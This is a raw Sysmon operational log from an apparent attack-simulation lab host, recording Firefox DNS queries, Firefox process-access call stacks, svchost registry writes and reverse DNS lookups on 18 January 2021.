22542200x800000000000000018260Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:23.809{59A5CD1D-945A-6005-3305-00000000A301}7052ocsp.godaddy.com.akadns.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018259Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:23.807{59A5CD1D-945A-6005-3305-00000000A301}7052ocsp.godaddy.com.akadns.net0192.124.249.23;192.124.249.24;192.124.249.36;192.124.249.41;192.124.249.22;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018258Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:23.807{59A5CD1D-945A-6005-3305-00000000A301}7052ocsp.godaddy.com0type: 5 ocsp.godaddy.com.akadns.net;::ffff:192.124.249.22;::ffff:192.124.249.23;::ffff:192.124.249.24;::ffff:192.124.249.36;::ffff:192.124.249.41;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018257Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:22.032{59A5CD1D-945A-6005-3305-00000000A301}7052iamtheproudownerofthelongestlongestlongestdomainnameinthisworld.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000018281Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:26.159{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018280Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:26.151{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018279Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:26.129{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018278Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:26.119{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000018297Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:26.014{59A5CD1D-945A-6005-3305-00000000A301}7052s0-2mdn-net.l.google.com02a00:1450:4001:800::2006;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018296Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:26.013{59A5CD1D-945A-6005-3305-00000000A301}7052pagead.l.doubleclick.net0216.58.206.2;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018295Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:26.013{59A5CD1D-945A-6005-3305-00000000A301}7052s0-2mdn-net.l.google.com0216.58.212.134;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018294Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:26.012{59A5CD1D-945A-6005-3305-00000000A301}7052googleads4.g.doubleclick.net0type: 5 pagead.l.doubleclick.net;::ffff:216.58.206.2;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018293Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:26.012{59A5CD1D-945A-6005-3305-00000000A301}7052s0.2mdn.net0type: 5 s0-2mdn-net.l.google.com;::ffff:216.58.212.134;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018292Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:25.201{59A5CD1D-945A-6005-3305-00000000A301}7052pki-goog.l.google.com0172.217.16.131;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018291Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:25.201{59A5CD1D-945A-6005-3305-00000000A301}7052ocsp.pki.goog0type: 5 pki-goog.l.google.com;::ffff:172.217.16.131;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018290Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:25.189{59A5CD1D-8E56-6005-2E00-00000000A301}246416.249.124.192.in-addr.arpa.0type: 12 cloudproxy10016.sucuri.net;C:\Windows\sysmon64.exe 22542200x800000000000000018289Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:25.186{59A5CD1D-8E56-6005-2E00-00000000A301}2464174.23.217.172.in-addr.arpa.0type: 12 fra15s22-in-f14.1e100.net;type: 12 fra15s22-in-f174.1e100.net;C:\Windows\sysmon64.exe 22542200x800000000000000018288Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:25.185{59A5CD1D-8E56-6005-2E00-00000000A301}246424.249.124.192.in-addr.arpa.0type: 12 cloudproxy10024.sucuri.net;C:\Windows\sysmon64.exe 22542200x800000000000000018287Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:25.184{59A5CD1D-945A-6005-3305-00000000A301}7052www.google.de02a00:1450:4001:800::2003;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018286Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:25.182{59A5CD1D-945A-6005-3305-00000000A301}7052www.google.de0172.217.18.163;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018285Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:25.181{59A5CD1D-945A-6005-3305-00000000A301}7052www.google.de0::ffff:172.217.18.163;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018284Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.949{59A5CD1D-945A-6005-3305-00000000A301}7052stats.l.doubleclick.net02a00:1450:400c:c0b::9c;2a00:1450:400c:c0b::9d;2a00:1450:400c:c0b::9a;2a00:1450:400c:c0b::9b;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018283Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.948{59A5CD1D-945A-6005-3305-00000000A301}7052stats.l.doubleclick.net0108.177.15.154;108.177.15.155;108.177.15.156;108.177.15.157;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018282Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.947{59A5CD1D-945A-6005-3305-00000000A301}7052stats.g.doubleclick.net0type: 5 stats.l.doubleclick.net;::ffff:108.177.15.157;::ffff:108.177.15.154;::ffff:108.177.15.155;::ffff:108.177.15.156;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018299Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:26.189{59A5CD1D-8E56-6005-2E00-00000000A301}2464157.15.177.108.in-addr.arpa.0type: 12 wr-in-f157.1e100.net;C:\Windows\sysmon64.exe 22542200x800000000000000018298Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:26.015{59A5CD1D-945A-6005-3305-00000000A301}7052pagead.l.doubleclick.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018300Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:26.190{59A5CD1D-8E56-6005-2E00-00000000A301}2464163.18.217.172.in-addr.arpa.0type: 12 fra15s29-in-f3.1e100.net;C:\Windows\sysmon64.exe 22542200x800000000000000018301Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:27.190{59A5CD1D-8E56-6005-2E00-00000000A301}24642.206.58.216.in-addr.arpa.0type: 12 fra16s20-in-f2.1e100.net;C:\Windows\sysmon64.exe 10341000x800000000000000018303Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:34.741{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018302Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:34.741{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 13241300x800000000000000018319Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:01:37.843{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\ValueBinary Data 13241300x800000000000000018318Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:01:37.843{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\ValueSizeDWORD (0x00000008) 13241300x800000000000000018317Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:01:37.843{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\KeySizeDWORD (0x00000000) 13241300x800000000000000018316Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:01:37.843{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\TimestampQWORD (0x01d6eda2-0x704abb36) 13241300x800000000000000018315Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:01:37.843{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\NetworksBinary Data 13241300x800000000000000018314Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:01:37.843{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\NumNetworksDWORD (0x00000001) 10341000x800000000000000018313Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:37.375{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018312Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:37.343{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018311Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:37.266{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea 10341000x800000000000000018310Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:37.266{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9 10341000x800000000000000018309Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:37.219{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018308Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:37.219{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018307Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:37.172{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971 10341000x800000000000000018306Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:37.172{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8 10341000x800000000000000018305Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:37.172{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla 